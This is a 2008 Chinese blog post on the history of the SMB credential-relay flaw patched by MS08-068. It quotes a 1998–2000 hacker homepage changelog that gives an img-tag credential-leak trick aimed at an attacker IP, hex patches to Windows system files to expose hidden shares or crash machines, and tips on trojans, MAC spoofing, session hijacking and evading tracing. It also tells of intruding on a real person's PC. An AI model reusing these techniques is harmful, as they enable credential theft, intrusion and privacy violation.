外面说ms08-068是七年半,实际上的确不止。 yuange说他发现这个问题时的最早记录是2000.3.16 ,我帮他刷新一下:至少在2000.1.15,yuange的主页上就提到了这个问题。另据某人考证,至少在1996年的时候MIT的人就发现了这个问题。Blackhat 1997上也有人讲。也就是说,这个漏洞从为人所知到修复,至少是12年。 那为什么现在忽然修复了呢?很简单,修复漏洞得花钱,据说微软修复一个漏洞前后要花300W刀。如果漏洞的没有被广泛利用,没有造成很大的影响,为啥要花这个钱呢?所以我很赞成某人的观点:这次微软动手修复,应该是因为metasploit出了一个好用的工具smb_relay.rb。smb_relay.rb的原理相当于SMB反弹重放+psexec,所以很黄很暴力很爽很好用。虽然这个漏洞威力强大,但是因为年代久远,当年又没有出过好用的工具,所以新人不知道,老人都忘了。 说起来,这个很黄很暴力很爽很好用的攻击方案当年yuange也想到了。一开始的设计的攻击方案需要双网卡,后来我琢磨也许可以借助VMWare的虚拟网卡,还一起测试过。印象最深刻的是,6年前看着yuange用这个办法,psexec了后来成为奥运志愿者的某同志的机器,看到在D盘根目录下存放着的某位女同事的照片 。桃花小郎君听说此事后,对yuange从此就十分忌惮。 我是一个有考据癖和收藏癖的人,yuange的主页自然是不会放过的。所以至今仍存有当年yuange在杭州天丽鸟空间那个主页的mirror。这里面的页面在互联网上恐怕已经完全找不到了,用万能的google也不行——估计连yuange自己的硬盘上都没有了 。 现在江湖上混的,可能很少有人见过当年这个虽然简陋难看但威力无穷充满邪恶知识的页面。特此向大家展示一下这个我多年的收藏: 技术资料栏目加入WINDOWS中断调用、PCI总线资料下载和我分析WINDOWS的TCP/IP、NETBIOS协议程序反汇编代码下载,有简单的注释还有几个漏洞注释。向你推荐栏目目录中文名改成英文名,SOFT-ICE、SOURCE7可以下载了。2000。03。24 技术资料栏目加入两篇文章,系统漏洞加入一个攻击WIN9X的程序下载,程序很小128字节。2000。03。23 对不起大家,原来的共享目录密码BUG补丁有问题.有个东西搞反了,所以实际上是没补上,只是对付我那攻击程序可以用,不过请你放心绝对没有增加BUG.有空改好大家再重下吧. 2000。01。15 说说我发现的一个新漏洞的应用吧,我发现NT系统一样有,还有并不要等到出来密码提示时早就发出自己的密码了。WINDOWS系统访问用户权限的机器的时候把自己的用户名密码等发出去,这可以借助邮件、主页等主动窃取密码。 主页或者邮件里面来个 <img src="file:\\ip\dir\filename" BORDER="0" HEIGHT="0" WIDTH="0"> 那filename弄个没有的文件名,不看原文件谁也不知道有这么个东西。IP是自己的IP,再借助现成的LOCKDOWN可以很方便的知道收件人(对于邮件)的IP、机器名、用户名,如果编一下程序或者用NETXRAY还可以得到可爱的密码(加密的,但可以离线破解,别人一点不知道),对于个人系统如果是NT系统那有了用户名和密码一般的机器都是你自由控制了。2000。01。15 昨天看程序看到WINDOWS系统访问用户级安全系统(NT系统 就是以用户级安全控制,WIN9X一般是共享控制),提示输入密码时,如果不输入密码(我们登录别人的系统不知道密码时往往要试试直接回车)系统自动用登录WINDOWS的用户名、密码登录,这就泄露了密码。这是不是也是破解屏保密码的一种方法呢?(一般屏保密码就是登录WINDOWS的密码)。不知道NT系统有否此漏洞,如果有那就。。。!1999。12。29 今天又有收获,WINDOWS的共享名后面加"$"就看不见,没想到这是在客户端处理的服务端根本就没处理。好了,现在远程管理(共享名ADMIN$),还有别的加$的共享保护都没用了,访问别人也方便多了,特别是有远程管理功能的机器一目了然,是不是很爽!破解方法是系统目录下的MSNP32。DLL文件找到16进制码8B 74 24 10 6A 24 56 E8 改成8B 74 24 10 6A FF 56 E8 就可以了。注意这文件始终是打开方式,所以你可以复制一份,修改,启动到DOS,再覆盖原来的,再启动。我公布了共享密码校验漏洞后很多人想到用共享名加“$”保护共享让你看不见不知道共享名所以也就没法破,看来这方法也失效了!1999。12。28 刚刚又发现WINDOWS的一个BUG,就是网络文件句柄范围没有检测。利用来攻击WIN95,98,98-2死机不成问题。漏洞还是NETBIOS的,影响内部网,如果TCP/IP协议绑定了NETBIOS那么可以远程攻击,也就是常说的139端口。 还有有可能利用来入侵,我正在加紧分析此漏洞的影响,希望能找到方法入侵。 欢迎大家经常来访问我的主页,说不定哪一天你就发现我的主页公布不用木马入侵没有共享目录的WINDOWS机器方法呢。 1999。12。27 大家很喜欢NETXRAY,把新的3.03版弄上去了,已经解密好了的,不用大家再自己动手了.还是在向你推荐栏目下载,注意记下序列号! 1999。12。22 这两天有空闲也有心情看WINDOWS程序了,竟然又有一收获。就是SMB的COMMAND 73、75命令没处理好,造成访问网络文件时可以攻击死机。刚试了下WIN2000没想到也死了。1999。12。18 作了个自动修改VREDIR.VXD的程序,可以支持WIN98,WIN98-2,可能还支持WIN95等,大家可以去系统漏洞下载.还有那木马也改了成支持多版本的.那\\IP\AAA的木马也作了修改,支持多版本,文件MUMA4.EXE可以去网络黑客下载.1999。12。8 网络共享访问BUG检验办法:如果你是WIN98,你DEBUG C:\WINDOWS\SYSTEM\VSERVER.VXD D 2B60 如果是 3C 01 75 24 改 E 2B60 33 C0 C3 写 W 退出 Q 再重启动,好了,现在你可以共享一个文件夹加上密码。你去找别的WINDOWS机器访问这个共享目录,这WINDOWS机器一串非法操作出来了,一般就死机定了。 1999。9。31 做了个木马,大家可以去网络黑客下载。此程序修正了WINDOWS98的共享目录密码校验BUG,但又开了一个后门,可以完全访问C盘,这木马很难发现的,因为没有修改注册表,INI文件,没有增加文件,没有开服务。 1999。8。25 好久没有更新主页了,今天放上共享目录密码校验BUG的补丁。还有告诉大家一个好消息,我又发现一个BUG,就是可以让别人访问共享目录出现非法错误可能导致死机,这可以利用来保护自己的共享目录,发现别人用那密码校验BUG攻击就反攻击惩罚一下。以后再仔细写利用这BUG的程序吧。 1999。8。21 技术资料加入了我的几篇新文章。还有一个自动画各种美妙曲线的程序,才50来K,很好看的。还有ARP协议也不怎么好,可以借此让自己内部网的机器访问不了别的机器或者上不了INTERNET。这可以攻破别人网络一台机器而轻松的使他的整个网络瘫痪。内部网真是太没安全了,而这就造成内部网的一台机器不安全所有的机器都没安全可言了。 1999。4。23 可以进入有密码的WINDOWS95,98共享目录。 好久没有更新主页了,不过又有收获,前段时间我又发现WINDOWS一个BUG,可以进入有密码的共享目录。如果他的机器开放了139端口,你可以用\\IP 远程访问他的共享目录的,所以这点还是影响很大的。可是微软竟然对他们的产品,他们的客户这么不负责任,我发几次妹儿报告我发现的两个BUG都没回信。欢迎大家到系统漏洞去下载利用我发现的漏洞的驱动程序。1999。2。1 对内部网蕴藏自己的IP。 大家都知道,在自己的机器上运行WINIPCFG,查看控制面版\网络\TCP/IP协议,在别人的机器上PING,NBTSTAT 等都能查看到你使用的IP,但有时网管不让用有些IP,那怎么办?前面我们已经有了用别人的IP的方法,但那样会被查出你用的IP,所以就知道你在不听话了。那有什么办法呢?我们解决一个问题就该先看这个问题是怎么的,可能大家都知道IP是不能直接通信的。直接通信是靠MAC。一个机器要与内部网的机器用IP通信,就得知道其MAC,它会广播“我的IP是XXX。XXX。XXX。XXX,我想知道YYY。YYY。YYY。YYY这个IP的网卡号(MAC)”,ARP协议就解决这问题。那我们不就有了很简单的解决办法了吗。收到广播要得到MAC,先看看你是谁呀,是路由器吗?不是路由器我可不能告诉你我的MAC,那样别的机器得不到你的MAC,将会查不出你的机器来。还有一个根据MAC查IP的协议,因为你提供了网上邻居等一些协议,内部网可以知道你的MAC,可以根据这查到你的IP,相应的这也处理掉。这下就剩自己机器上的一些暴露自己IP的地方了。改VP。386驱动,不丛注册表取IP,那样TCP/IP协议里的IP可以随便填了,还有WINIPCFG取IP时返回一个假的给它。好了,现在别人(内部网的人,躲外部网查看你的真IP的方法是登录代理等跳转)不知道你的IP了。还有我们用IP开机就在网上了,别人随时可以攻击你,这点不好。我们可以做个开关,可以随时断开随时连上,还有换IP时,大家都是改TCP/IP协议里的再开机,多不方便呀,我还想上网中随时换我的IP呢。~_~ 前面的改法也使这两点很方便的就解决了。 1998。12。16 不用代理实现内部网共享IP。 大家都知道内部网可以用代理实现IP共享,可是我们有时不想用代理(没代理软件,服务器,代理要收费),我们是不是可以考虑不用代理实现IP共享呢!大家想一想,一个机器可以开很多浏览窗口也正常使用,那就是协议中已经提供了接口了。好,让我们来把两台机器的IP改成一样,开机一看报告IP冲突!我们想一想IP通信的协议就知道该冲突的了,改一个机器的网卡号为另一个机器的(我们尽量只改一个机器的东西,让另一个机器什么也不改还要它不觉得有鬼!~_~大家知道这是什么意思了吧!)再开机,哈哈,不冲突了,赶快上网一试!可是两个机器都报告断开与服务器的连接,只有一个机器开的时候可以上网。其实这一步也有用处了,别人不在我用他的IP正常上网,即使他来了也不报告有冲突,他也不知道我在用他的IP。 看来两个机器收到包没分清哪个是自己的。我们仔细想想一个机器是怎么区分数据是哪个窗口的,原来是有个端口(有的叫套接字,SOCKET),每次连接得分配一个端口,数据被定位到端口(就是对应应用程序,甚至应用程序的窗口)。不是那个端口的它不处理。但是现在是两个机器呀,两个机器也不知道另一个机器分配到多少了。那就干脆改吧。还是改一个机器的,找到MSTCP驱动程序了,那里分配端口。MSTCP程序为TCP协议(IP是它的上层协议)分配了0X401--0X1388的端口,改一个机器为0X7401--0X8388,应该没有与这个机器的别的协议冲突,还有包序数什么的。重起开机上网,还是断开与服务器的连接。这回怪了,想想数据发出去,接回来分发到应用程序都没问题的了。打开NETXRAY,拦截本机与实验服务器的IP通信。仔细查看,原来在连接握手的3次通信时,另一个机器也接收到了服务器的握手通信,但它没有要求建立连接,所以它就发了一个连接复位的包,造成连接中断。这点处理有点和TCP连接后的处理不一样,TCP连接后的数据包机器接收到不是自己的包只是简单的丢掉不处理。这点要只改一个机器还很不好办。可以改自己的机器收到不是自己要的握手连接包不发复位包。这样另一个机器就完全不受影响,但有它这个机器就连不上了。可以再改改这个机器的一些东西,让别的机器查不出这个机器的IP,以便更加安全(如果是盗用最好机器名改改,或者改改驱动软件只对网关(路由器)的包回复,但别人知道了高手也可欺骗你的哟。也得注意如果是WIN95,98,两个机器名一样了,还有都装了IPX/SPX的话就小心死机了,这是前面说的NMPI协议BUG)。对自己的几个机器想共享那好办,机器都改改握手复位的地方就是了。 还有一个问题就是一个网卡配多个IP,解决代理服务器要几个网卡等问题,大家可以自己实验以在实践中提高自己的水平。其实这肯定是能实现的,好象有这样的软件了吧!。1998。11。25 我昨天又发现一个网络大BUG,在同一网段可以弄死别人的机器 SMPI协议端口收到一个名字服务包(类型0x14),如果网卡号,机器名和它自己一样就死机!一般不会收到这样的包,因为网卡号不一样,但攻击程序可以获得你的机器网卡号,机器名来攻击的!我不知道原来发现这BUG没有,也不知道到底影响哪些版本! 1998.11.20 很多人下载NETXRAY不成功,要求我给妹儿,那文件实在太大,所以没法妹儿。原来向你推荐里面的连接是国外的,也不支持断点续传,所以大家老不成功。在此我也花了点时间把文件传到我的主页服务器上了,还是在向你推荐栏目里面下载,不知道现在大家能不能下载? 大家不要在实用软件栏目下载太大的软件,那也可能太大了的文件下不了! 1998。10。04 一般网卡可以接收广播地址和自己的网卡地址的通信,现在很多设备都支持网络管理,网卡也能通过编程接收所有的地址,像我推荐的网络报文分析软件NETXRAY就可以看到同一网段的所有通信,我猜只能是用此方式了。此方式的资料没有,只有有时间去分析这NETXRAY了!到时那就很方便了! 还有INTERNET上的通信改路由用假IP是一个方法,但太大的网路的路由被改可能很容易被发现,发现了可能麻烦太大。所以方向还是不改路由或者改很小范围的路由,而主要通过主机跳转来保证安全。这只是在别人的机器上留下了假IP地址或者是你最后跳转的主机的IP,别人后来查看就只得到这IP不能知道你是谁了。当然如果进去了可以也清理掉这痕迹。 但是如果别人当时发现你,他可以跟踪路由发现你的地理位置,所以一要干净利落,二要查看到别人的跟踪马上退出。这又有个问题了,怎样发现别人的跟踪? 1998。09。14 很多人来访问我的主页,想得到网络帐号盗用的程序,可我没时间写,为了不让大家有白来一趟的感觉,我特地把我的帐号盗用的原理说出来,让大家也算有一点小收获吧。还有一个大家要学会去想,去领会这些思想,我相信这些比单一的程序更重要。通过我的一些技术方面的文章,指引大家自己去想自己去获得,这也可说是本站的一个目的吧。有哪一位高手有空也不妨替我写出程序来,即锻炼了你的编程技术也方便了众多网友,那就谢了。 网络认证后的凭证需要加强! 袁哥 一般帐号登录先有个认证,这很多是密码认证。认证过后双方有了一个凭证,以后通信就用这一凭证。这一凭证是什么内容,容不容易伪造就直接影响到以后通信的真实性。 可是网上很多系统的这凭证内容真不敢恭维。比如NOVELL,凭证内容就有网卡地址,连接号(USERLIST列出的数字,在每个工作站都可以得到任何用户的连接号。),还有就是通信套接字,包序数。其实后两项只是应用程序需要的内容。大家一看就知道这凭证的伪造的关键是网卡地址了。其实原来可能很多人都想到的,改网卡号可以截获别人的包,可是可能很多人听说网卡号是唯一的也就罢了,包括我原来也这么认为。但我们仔细看看网卡到底是怎么的,不看不知道,看了吓你一跳!原来大多网卡网卡号也是可以编程的。这就显然帐号可以冒用了,等别人密码认证过后,马上改自己的卡号连接号等为别人的,你就可以以他的身份与服务器通信了。这就冒用了别人的帐号了。别人的网卡号的获得相信你在每个工作站都能轻松的获得的吧! 这看起来好象不该怪系统,怪网卡怪网卡里面的程序,你为什么要提供网卡地址的编程呢?但我们仔细想想,你的服务你的认证,怎么能轻易拿别人来作为凭证呢? 有了问题,我们也该想想到底该怎么来解决呢?显然现在认证后的凭证是不能用别的硬件号什么的。即使大家的没法改,但别人也可以自己做一个自己专用的可编程的呀。这显然就只能是数字的凭证了,那数字的怎么凭证呀?这不是更好伪造吗?其实数字是能做凭证的,这就是现在很热的数字认证的内容了,在此也不多说了。 显然现在的WWW网也可以利用这一技术。这儿的路由器就好比是网卡,就看对路由器的掌握了。本人正找路由器的资料看,可惜很难找,有好资料的妹儿我。谢了!! 1998。09。10 我的主页访问记数猛增,我都有点觉得对不起大家了。很想马上写好程序,可我也要工作要学习呀。如果有有时间对WINDOWS编程比较熟的朋友想担当这一重任,可以妹儿我,我把技术问题告诉你,你帮我写出程序,也方便众多网友!先谢了。 1998。09。09 下午 我昨天实验盗用内部网帐号成功!看来网上很多认证得好好改一改了!我有空会编好程序的,你有空就来看看吧。到时大家要取得管理帐号,密码文件什么的就方便了!1998。09。08 我改好了WIN95下的3COM网卡的驱动程序,大家可以到网络黑客栏目下栽。1998。09。05 我发现网卡地址也可改的了,你可以在内部网络里干一点点不准干的事,也逮不着你了!技术方法等问题等我有空慢慢写出来让大家分享!你有空来看看哟! 1998。09。04 还有NETWARE的管理者的权限的获得,WIN95,WINNT本地随便登陆,等等。大家不时来看看吧,我会慢慢的加上我的很多好东东的!
http://hi.baidu.com/tombkeeper - 选录
yuange和ms08-068的历史和八卦
2008-11-14链接